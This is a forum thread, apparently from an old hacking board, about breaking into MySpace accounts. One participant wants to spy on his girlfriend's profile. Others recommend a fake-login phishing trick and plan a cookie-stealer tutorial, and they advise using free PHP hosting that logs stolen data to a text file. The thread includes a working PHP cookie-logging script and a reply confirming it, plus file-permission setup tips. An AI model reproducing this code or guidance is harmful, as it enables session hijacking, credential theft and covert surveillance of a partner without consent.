-
007 server
I somewhat understand what iam suppose to do but everytime i go to oo7ihost.com i get this message when i attempt to register....Fatal error: Call to a member function on a non-object in /var/wkscript/www/register.jsp on line *5. So if you have any other good servers i can use plzzz let me know.
-
[QUOTE=gldetolla;207*2]I somewhat understand what iam suppose to do but everytime i go to oo7ihost.com i get this message when i attempt to register....Fatal error: Call to a member function on a non-object in /var/wkscript/www/register.jsp on line *5. So if you have any other good servers i can use plzzz let me know.[/QUOTE]
every once in awhile 007ihost.com is down and maybe you didnt copy the url right to confirm that you put it in right click [URL="http://007ihost.com"]here[/URL]
-
Got a question for you dipman would you mind talkin on aim or through a email?
-
Is there any program that can detect this? like a persons software, if you don't mind though would still like to talk to you over aim or email if not I understand thanks.
-
[QUOTE=barracks**;207**]Is there any program that can detect this? like a persons software, if you don't mind though would still like to talk to you over aim or email if not I understand thanks.[/QUOTE]
if you have a question ask it here just dont ask anything stupid that you might get banned for
-
[QUOTE=dipman44;20742]if you have a question ask it here just dont ask anything stupid that you might get banned for[/QUOTE]
Na I know, well i'm tryin to see if my girl is talkin to her ex cause she recently changed her profile and hid all her friends so ... but I have a couple questions, what one would be if she uses that fake login it saves the cookies and you can then view the information? Two if you have any what's a good way for me to use that like a video or pic?
-
I did not post a cookie stealer thats another way to get peoples password but one of the easiest ways is to message her and make the reply button the fake login. which is in one of the codes i posted
-
[QUOTE=dipman44;20747]I did not post a cookie stealer thats another way to get peoples password but one of the easiest ways is to message her and make the reply button the fake login. which is in one of the codes i posted[/QUOTE]
The reply button method no longer works. It has been fixed by myspace, try it and see for yourself.
-
[QUOTE=Nivek;20756]The reply button method no longer works. It has been fixed by myspace, try it and see for yourself.[/QUOTE]
yes i know sorry about that everyone
-
[QUOTE=dipman44;2076*]yes i know sorry about that everyone[/QUOTE]
Hey dipman maybe when you get the time you can post a tutorial on how to gain access to a myspace account by using a cookie stealer?? People might have more success with that because only the dumbest of the dumb will fall for the fake login screen.
-
[QUOTE=Nivek;2078*]Hey dipman maybe when you get the time you can post a tutorial on how to gain access to a myspace account by using a cookie stealer?? People might have more success with that because only the dumbest of the dumb will fall for the fake login screen.[/QUOTE]
well as soon as i can find a free php host that cookie stealers would work on i will but im having trouble finding one once i find one i will probably make a video tutorial for everyone.
-
[QUOTE=dipman44;2078*]well as soon as i can find a free php host that cookie stealers would work on i will but im having trouble finding one once i find one i will probably make a video tutorial for everyone.[/QUOTE]
Try:
[url]http://www.freehostia.com/free_hosting.html[/url]
I've got like a whole load of hosting bookmarks; that's just one of them.
If you use a free host, don't write the script to use the PHP mail function. They always disable that so stupid spammers can't spread their shit through the free service. Write it to log the info to a text file, then set permissions on the [B]whole site[/B] (including htdocs) recursively to 755. It should work.
-
[QUOTE=mike*5*;20787]Try:
[url]http://www.freehostia.com/free_hosting.html[/url]
I've got like a whole load of hosting bookmarks; that's just one of them.
If you use a free host, don't write the script to use the PHP mail function. They always disable that so stupid spammers can't spread their shit through the free service. Write it to log the info to a text file, then set permissions on the [B]whole site[/B] (including htdocs) recursively to 755. It should work.[/QUOTE]
would this be how i would write the php?:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
-
[QUOTE=dipman44;207**]would this be how i would write the php?:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>[/QUOTE]
Yes, but you would have to set the permissions on htdocs and log.txt to 755.
-
[QUOTE=mike*5*;207*7]Yes, but you would have to set the permissions on htdocs and log.txt to 755.[/QUOTE]
I dont want to sound like a complete retard but how would i do that?